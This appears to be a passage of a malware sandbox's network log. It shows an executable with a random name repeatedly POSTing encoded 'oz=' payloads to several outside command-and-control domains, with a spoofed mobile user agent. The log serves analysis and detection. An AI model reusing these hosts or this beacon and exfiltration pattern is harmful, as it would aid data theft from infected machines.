39 | 192.168.11.20 | 49769 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:09:24.154345989 CEST | 821 | OUT | POST /yyvd/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dhkatp.vip
                                                                                                                                              Origin: http://www.dhkatp.vip
                                                                                                                                              Referer: http://www.dhkatp.vip/yyvd/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=Ao0pCCEh0VO3GSk7PSnzlmJf+udX3ekY8nFy2PK23EJo7JkpxM1ZqiICtauYH6B9dG3kYyMeJkifWCVj9vtUML9u1/lCeDNKf8kfhgMkfFBaHDlhb200ntaip/y4paDwkGAn1Toms6DkTgKLW7SCguSIg6VarhvjpBxS4UvJCJ6WxE/lWYWobg5keRMQh7S4lzfqzH6IEuWJDrslqtXfm5w=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.11.20 | 49770 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:09:26.796478033 CEST | 1289 | OUT | POST /yyvd/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dhkatp.vip
                                                                                                                                              Origin: http://www.dhkatp.vip
                                                                                                                                              Referer: http://www.dhkatp.vip/yyvd/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.11.20 | 49771 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:09:29.432348967 CEST | 545 | OUT | GET /yyvd/?oz=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dhkatp.vip
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:09:36.586494923 CEST | 399 | IN | HTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:09:36 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.11.20 | 49772 | 103.21.221.4 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:09:42.061569929 CEST | 837 | OUT | POST /iydt/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.tempatmudisini01.click
                                                                                                                                              Origin: http://www.tempatmudisini01.click
                                                                                                                                              Referer: http://www.tempatmudisini01.click/iydt/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=OcHLqbGcDYEKrCNWRAarwXHtD4kmPOQ1h5MueUyg60ICPO70iVoWCItEtu8IiVp6Ayt2w/fMwNO+44s5KcrsMoZxEtjPL5UlYOBJBylNurgR0jn4zmBmu2PRjd6ch806vRKydnb1PAYWZsGwSaZqNEYJzXuAhzKBG7Q0dO/m1WOXNGWCu8FljPoDlQVpZB63fg==
Oct 4, 2024 08:09:42.768088102 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Connection: close
                                                                                                                                              x-powered-by: PHP/7.4.33
                                                                                                                                              x-litespeed-tag: 894_HTTP.404
                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                              link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                                                                              x-litespeed-cache-control: no-cache
                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                              transfer-encoding: chunked
                                                                                                                                              content-encoding: br
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              date: Fri, 04 Oct 2024 06:09:42 GMT
                                                                                                                                              server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.11.20 | 49773 | 103.21.221.4 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:09:44.927867889 CEST | 857 | OUT | POST /iydt/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.tempatmudisini01.click
                                                                                                                                              Origin: http://www.tempatmudisini01.click
                                                                                                                                              Referer: http://www.tempatmudisini01.click/iydt/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:09:45.584275007 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Connection: close
                                                                                                                                              x-powered-by: PHP/7.4.33
                                                                                                                                              x-litespeed-tag: 894_HTTP.404
                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                              link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                                                                              x-litespeed-cache-control: no-cache
                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                              transfer-encoding: chunked
                                                                                                                                              content-encoding: br
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              date: Fri, 04 Oct 2024 06:09:45 GMT
                                                                                                                                              server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.11.20 | 49774 | 103.21.221.4 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:09:47.788780928 CEST | 1289 | OUT | POST /iydt/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.tempatmudisini01.click
                                                                                                                                              Origin: http://www.tempatmudisini01.click
                                                                                                                                              Referer: http://www.tempatmudisini01.click/iydt/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:09:48.428112030 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Connection: close
                                                                                                                                              x-powered-by: PHP/7.4.33
                                                                                                                                              x-litespeed-tag: 894_HTTP.404
                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                              link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                                                                              x-litespeed-cache-control: no-cache
                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                              transfer-encoding: chunked
                                                                                                                                              content-encoding: br
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              date: Fri, 04 Oct 2024 06:09:48 GMT
                                                                                                                                              server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.11.20 | 49775 | 103.21.221.4 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:09:50.636223078 CEST | 557 | OUT | GET /iydt/?oz=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.tempatmudisini01.click
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:09:51.194473982 CEST | 530 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                              Connection: close
                                                                                                                                              x-powered-by: PHP/7.4.33
                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                              x-redirect-by: WordPress
                                                                                                                                              location: http://tempatmudisini01.click/iydt/?oz=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&UJ9=qN-llTKPHxntPrv0
                                                                                                                                              x-litespeed-cache: miss
                                                                                                                                              content-length: 0
                                                                                                                                              date: Fri, 04 Oct 2024 06:09:51 GMT
                                                                                                                                              server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.11.20 | 49776 | 133.130.35.90 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:09:57.592662096 CEST | 804 | OUT | POST /qwk1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.komart.shop
                                                                                                                                              Origin: http://www.komart.shop
                                                                                                                                              Referer: http://www.komart.shop/qwk1/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=+s6bZXAYHnamcxa6fjAsR80osylzedthnp5b42yrQsKAm4a7kuvJtAgTwZ1U8TdUm/Xt5vLOfbYUD5etAK4BNkEBHne1ZVts0TAZGvVQHIqRI/L2cyBJO5BdBueXRD9XfnqvjTtme6reKSrph/t1fH6T8aYm+nWfeT6us/kS1YybA+o0gUQWpO2rCiqbl0DnIw==
Oct 4, 2024 08:09:57.888267040 CEST | 668 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              content-encoding: gzip
                                                                                                                                              content-type: text/html
                                                                                                                                              date: Fri, 04 Oct 2024 06:09:57 GMT
                                                                                                                                              etag: W/"66fe0220-2b5"
                                                                                                                                              server: nginx
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              content-length: 454
                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.11.20 | 49777 | 133.130.35.90 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:10:00.405117035 CEST | 824 | OUT | POST /qwk1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.komart.shop
                                                                                                                                              Origin: http://www.komart.shop
                                                                                                                                              Referer: http://www.komart.shop/qwk1/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=+s6bZXAYHnamcQK6QgosWc0r1ClzHtsmnuxb4yq7ReuAmd+7lqDJqAgT451djDc5m/aN5qrOfbMUD4utB8wGM0EHLHe7dVts0TAZGsppHIyRIqD2dQpKVZBSCueXVD9TfnrKjSwDe4jeKTbpmrB6QH6vjKZXv03ISg7Tj9FPz7CGBo5u9mkyqdqZGSTzn2C8V35vpwwBpyNw6XHm79WxFDM=
Oct 4, 2024 08:10:00.688692093 CEST | 668 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              content-encoding: gzip
                                                                                                                                              content-type: text/html
                                                                                                                                              date: Fri, 04 Oct 2024 06:10:00 GMT
                                                                                                                                              etag: W/"66fe0220-2b5"
                                                                                                                                              server: nginx
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              content-length: 454
                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.11.20 | 49778 | 133.130.35.90 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:10:03.216897011 CEST | 1289 | OUT | POST /qwk1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.komart.shop
                                                                                                                                              Origin: http://www.komart.shop
                                                                                                                                              Referer: http://www.komart.shop/qwk1/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:10:03.566906929 CEST | 668 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              content-encoding: gzip
                                                                                                                                              content-type: text/html
                                                                                                                                              date: Fri, 04 Oct 2024 06:10:03 GMT
                                                                                                                                              etag: W/"66fe0220-2b5"
                                                                                                                                              server: nginx
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              content-length: 454
                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.11.20 | 49779 | 133.130.35.90 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:10:06.026305914 CEST | 546 | OUT | GET /qwk1/?oz=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.komart.shop
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:10:06.308583021 CEST | 883 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              content-type: text/html
                                                                                                                                              date: Fri, 04 Oct 2024 06:10:06 GMT
                                                                                                                                              etag: W/"66fe0220-2b5"
                                                                                                                                              server: nginx
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              content-length: 693
                                                                                                                                              connection: close
                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.11.20 | 49780 | 137.175.33.56 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:10:11.597064972 CEST | 795 | OUT | POST /ytua/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dxeg.lol
                                                                                                                                              Origin: http://www.dxeg.lol
                                                                                                                                              Referer: http://www.dxeg.lol/ytua/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:10:11.751032114 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:10:11 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Last-Modified: Thu, 03 Oct 2024 16:20:03 GMT
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: W/"66fec433-4a47"
                                                                                                                                              Content-Encoding: gzip
Oct 4, 2024 08:10:11.751188040 CEST | 1289 | IN | response body (continued)
Oct 4, 2024 08:10:11.751399040 CEST | 1289 | IN | response body (continued)
Oct 4, 2024 08:10:11.751481056 CEST | 726 | IN | response body (continued)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.11.20 | 49781 | 137.175.33.56 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:10:14.291415930 CEST | 815 | OUT | POST /ytua/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dxeg.lol
                                                                                                                                              Origin: http://www.dxeg.lol
                                                                                                                                              Referer: http://www.dxeg.lol/ytua/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:10:14.444969893 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:10:14 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Last-Modified: Thu, 03 Oct 2024 16:20:03 GMT
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: W/"66fec433-4a47"
                                                                                                                                              Content-Encoding: gzip
Oct 4, 2024 08:10:14.445086956 CEST | 1289 | IN | response body (continued)
Oct 4, 2024 08:10:14.445208073 CEST | 1289 | IN | response body (continued)
Oct 4, 2024 08:10:14.445267916 CEST | 726 | IN | response body (continued)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.11.20 | 49782 | 137.175.33.56 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:10:16.978709936 CEST | 2578 | OUT | POST /ytua/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dxeg.lol
                                                                                                                                              Origin: http://www.dxeg.lol
                                                                                                                                              Referer: http://www.dxeg.lol/ytua/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:10:16.978745937 CEST5386OUTData Raw: 75 30 59 50 46 79 54 51 30 6d 77 4b 6b 55 44 4d 36 31 66 57 56 46 61 6a 5a 50 58 6f 6b 43 6e 4e 76 65 79 7a 44 50 36 47 64 44 42 66 4a 68 57 70 6b 4e 4b 76 49 78 34 67 6d 45 34 6e 39 35 4a 42 44 2b 33 75 6c 34 54 71 74 39 78 68 73 47 74 42 76 46
                                                                                                                                              Data Ascii: u0YPFyTQ0mwKkUDM61fWVFajZPXokCnNveyzDP6GdDBfJhWpkNKvIx4gmE4n95JBD+3ul4Tqt9xhsGtBvFSeWc2K/hGVNEeTHcJUiuulmLpGzRjK7zezg/57TxD+akgirwrCy96GmMcho77/suYzkz08TOsOhr0yLOQzs+YxyYKKEsnsTJqzF28KCS3F/E5qxDTquJoS6VSAJBgGvOLQqF5Ew6RS1QJNURM/DUmGqkqo41xWj8K
Oct 4, 2024 08:10:17.133213043 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 04 Oct 2024 06:10:17 GMT
Content-Type: text/html
Last-Modified: Thu, 03 Oct 2024 16:20:03 GMT
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"66fec433-4a47"
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.11.20 | 49783 | 137.175.33.56 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:10:19.663079977 CEST | 543 | OUT | GET /ytua/?oz=eEoKyIBkgP1r3UaSX5x2BcdCaSeQE0m7SIzn6MAF2Eoa7eZjgA7VjWJ9hDDUm15GkCbg2BHkZRaH6Ojl2CuAMP081j8WR4/cwGyXJgzH3SFq+T0y0nykltc=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.dxeg.lol
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:10:19.817035913 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 04 Oct 2024 06:10:19 GMT
Content-Type: text/html
Content-Length: 19015
Last-Modified: Thu, 03 Oct 2024 16:20:03 GMT
Connection: close
